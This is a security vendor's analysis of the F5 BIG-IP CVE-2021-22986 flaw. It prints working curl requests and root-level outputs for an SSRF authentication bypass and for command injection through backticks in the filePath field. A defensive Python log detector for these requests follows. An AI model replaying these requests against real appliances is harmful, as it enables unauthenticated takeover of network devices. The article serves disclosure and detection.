18 May 2021

F5 BIG-IP CVE-2021-22986 Vulnerability Detection and Analysis


Following the update published for the Unauthenticated Remote Code Execution vulnerability found in the management panel of F5 BIG-IP and BIG-IQ products under the code CVE-2021-22986, a new vulnerability has emerged.

In this article, we also touch on the previous vulnerability and share our detailed analysis of CVE-2021-22986, which was exploited again after patching.

You can use the F5 BIG-IP Scanning and Detection Tool to check whether your system is affected by this vulnerability. Our tool has been updated for both the previous and new vulnerability.

CVE-2021-22986 Vulnerability Part 1 – Code Execution

When the vulnerability (CVE-2021-22986) first emerged, requests we made to the /mgmt/tm/util/bash endpoint allowed commands to be executed without any authentication.

However, this usage was closed after the initial vulnerability was patched.

When we examine the new vulnerability, we can continue to execute commands at this endpoint and also at the /mgmt/tm/access/bundle-install-tasks endpoint. However, exploiting this vulnerability requires an administrator account.

In the new situation we face, we can exploit the vulnerability as Authenticated Remote Code Execution. Although theoretically valid, this will (in most cases) not be applicable for a real-world attacker.

At the first endpoint, /mgmt/tm/util/bash, we can send a request using the admin account with the following commands and run the id command:

# curl -ksu admin:P******3 -H "Content-Type: application/json" ***.***.5/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .
{
    "kind": "tm:util:bash:runstate",
    "command": "run",
    "utilCmdArgs": "-c id",
    "commandResult": "uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"
}

In the response returned from the application, we can see in the commandResult section that our desired command executed successfully and ran with root privileges.

At the other endpoint, we enter a command input to send a ping to a computer under our own control:

# curl -ksu admin:P*****3 ***.***.5/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"`ping 172.***.***.1`"}' | jq .
{
    "filePath": "`ping 172.***.***.1`",
    "toBeInstalledAppRpmsIndex": -1,
    "id": "2f1ff697-6b4f-450e-90d8-4babdd9973d2",
    "status": "CREATED",
    "userReference": {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    },
    ...
    "kind": "tm:access:bundle-install-tasks:iappbundleinstalltaskstate",
    "selfLink": "https://localhost/mgmt/tm/access/bundle-install-tasks/2f1ff697-6b4f-450e-90d8-4babdd9973d2"
}

Unlike the previous scenario, this time we cannot see the output of our command, but when we examine the processes running on the server we can see that our command is actually being passed as a parameter to the tar command.

Note that the ping command we used as the payload above was enclosed in backtick (`) characters, which is what causes the shell to execute it when the value is interpolated into the tar command line.

# ps aux | grep ping
root     18825  0.0  0.0  11656   320 ?        S    16:43   0:00 /bin/bash -c tar -xf `ping 172.***.***.1` -O > /dev/null
root     18826  0.0  0.0  24884   860 ?        S    16:43   0:00 ping 172.***.***.1

In the first section we examined the endpoints where we could execute commands, but we are still blocked by the authentication barrier.

CVE-2021-22986 Authentication Bypass, SSRF

The admin account scenario above demonstrates a specific way to exploit the vulnerability. However, for a real-world cyber attacker, it would not be appropriate to consider this a practically exploitable vulnerability. Attackers would prefer to be able to exploit this vulnerability without authentication.

In this section, we describe how the vulnerability can be exploited without authentication.

A second vulnerability that constitutes CVE-2021-22986 is the SSRF usage found in the loginReference.link parameter of the /mgmt/shared/authn/login endpoint.

In other words, this endpoint can be used to make a request to any desired address. If the loginReference.link parameter is used to make the application send a request to itself, authentication can be bypassed.

As an example, we provide the parameter as https://localhost/mgmt/tm/access/bundle-install-tasks.

Can we successfully execute a command?

Unfortunately, no. Let us not forget that we also need to send certain parameters (for example, filePath) to the endpoints containing the code execution vulnerability. Even when authentication is successfully bypassed using SSRF to access the endpoints with the code execution vulnerability, the attempt will fail because we cannot send any parameters.

Cybersecurity researchers changed their perspective and were able to create a valid Authorization Token by sending a request via the SSRF vulnerability to an endpoint where tokens can be generated. F5 BIG-IP and BIG-IQ contain several endpoints that generate tokens. Sending a request to one of these endpoints is sufficient to exploit the vulnerability with unauthorised access.

In this case, /access/file-path-manager/indexing is used:

# curl -ks ***.***.5/mgmt/shared/authn/login -d '{"username":"admin", "bigipAuthCookie":"", "authProviderName":"local", "loginReference":{ "link":"https://localhost/access/file-path-manager/indexing" }, "userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}}'  | jq .
{
  "username": "admin",
  "bigipAuthCookie": "",
  "loginReference": {
    "link": "https://localhost/access/file-path-manager/indexing"
  },
  "token": {
    "token": "WZDXLAHGSAYWEW44DZB7D34V6T",
    "name": "WZDXLAHGSAYWEW44DZB7D34V6T",
    "userName": "admin",
    "authProviderName": "local",
    ...
    "timeout": 1200,
    "startTime": "2021-05-17T18:51:26.605-0700",
    ...
    "kind": "shared:authz:tokens:authtokenitemstate",
    "selfLink": "https://localhost/mgmt/shared/authz/tokens/WZDXLAHGSAYWEW44DZB7D34V6T"
  },
  "generation": 0,
  "lastUpdateMicros": 0
}

As can be seen, in the response returned from the server, we can obtain the necessary Authorization Token in the token.token field. Now we can try to execute a command using the token we obtained, without any user credentials:

# curl -ks -H "Content-Type: application/json" -H "X-F5-Auth-Token: WZDXLAHGSAYWEW44DZB7D34V6T" ***.***.5/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}' | jq .
{
  "kind": "tm:util:bash:runstate",
  "command": "run",
  "utilCmdArgs": "-c id",
  "commandResult": "uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0\n"
}

In this case, authentication was bypassed using SSRF and a valid Authorization Token was obtained. We then see that we can access the endpoints where commands are executed using this token, confirming that the vulnerability can be exploited.

The published Metasploit module also uses the unauthorised access technique described in this article.
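The two request patterns that make up the chain above (a login whose loginReference.link points back at the appliance itself, followed by token-authenticated calls to the command endpoints) are what a defender should look for in management-interface request logs. The following detector is an added example written for this article, not Privia Security's tool or F5's code; the request records, the log field names and the token value are constructed for illustration.

```python
import json
import re
from urllib.parse import urlparse
# Endpoints the article shows executing commands once a token is presented.
RCE_ENDPOINTS = ("/mgmt/tm/util/bash", "/mgmt/tm/access/bundle-install-tasks")
LOGIN_ENDPOINT = "/mgmt/shared/authn/login"
LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}   # link pointed back at the appliance
SHELL_META = re.compile(r"[`$;|&]")                  # backtick injection seen in filePath

def classify_request(req):
    """Return finding strings for one request dict (method, path, headers, body)."""
    findings = []
    path = urlparse(req["path"]).path.rstrip("/")
    try:
        body = json.loads(req.get("body") or "{}")
    except json.JSONDecodeError:
        body = {}
    if path == LOGIN_ENDPOINT and req["method"] == "POST":
        link = (body.get("loginReference") or {}).get("link", "")
        host = urlparse(link).hostname or ""
        if host in LOOPBACK_HOSTS or host.startswith("127."):
            findings.append("ssrf-login: loginReference.link -> " + link)
    if path in RCE_ENDPOINTS:
        headers = {k.lower(): v for k, v in req.get("headers", {}).items()}
        if "x-f5-auth-token" in headers:
            findings.append("token-auth to command endpoint " + path)
        if SHELL_META.search(str(body.get("filePath", ""))):
            findings.append("shell metacharacters in filePath: %r" % body.get("filePath"))
        if body.get("command") == "run":
            findings.append("util/bash run: %s" % body.get("utilCmdArgs"))
    return findings

# Constructed sample records modelled on the exchanges shown above (not real logs).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": LOGIN_ENDPOINT, "headers": {}, "body": json.dumps(
        {"username": "admin", "loginReference": {"link": "https://localhost/access/file-path-manager/indexing"}})},
    {"method": "POST", "path": "/mgmt/tm/util/bash", "headers": {"X-F5-Auth-Token": "EXAMPLETOKEN"},
     "body": json.dumps({"command": "run", "utilCmdArgs": "-c id"})},
    {"method": "POST", "path": "/mgmt/tm/access/bundle-install-tasks", "headers": {"X-F5-Auth-Token": "EXAMPLETOKEN"},
     "body": json.dumps({"filePath": "`ping 192.0.2.1`"})},
    {"method": "GET", "path": "/mgmt/tm/sys/version", "headers": {"Authorization": "Basic REDACTED"}, "body": ""},
]

def scan(records):
    """Map the index of each suspicious record to its findings."""
    hits = (classify_request(r) for r in records)
    return {i: h for i, h in enumerate(hits) if h}
```

A hit on the login pattern followed shortly by a token-authenticated request to either command endpoint from the same source is the full chain and should be treated as a compromise indicator rather than a single suspicious request.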

CVE-2021-22986 Privia Security – F5 Checker

You can use the F5 Checker (CVE-2021-22986) application we have prepared specifically for organisations free of charge at f5-check.priviasecurity.com. This tool, which you can use with confidence, provides information about whether your system is affected by this vulnerability.

Our tool performs this check by running the harmless “uname -a” command on the F5 BIG-IP or BIG-IQ product in your system, using the technique described above. If your system is affected by this vulnerability, we recommend upgrading the product software to the latest version.


Privia Security GitHub: https://github.com/Privia-Security
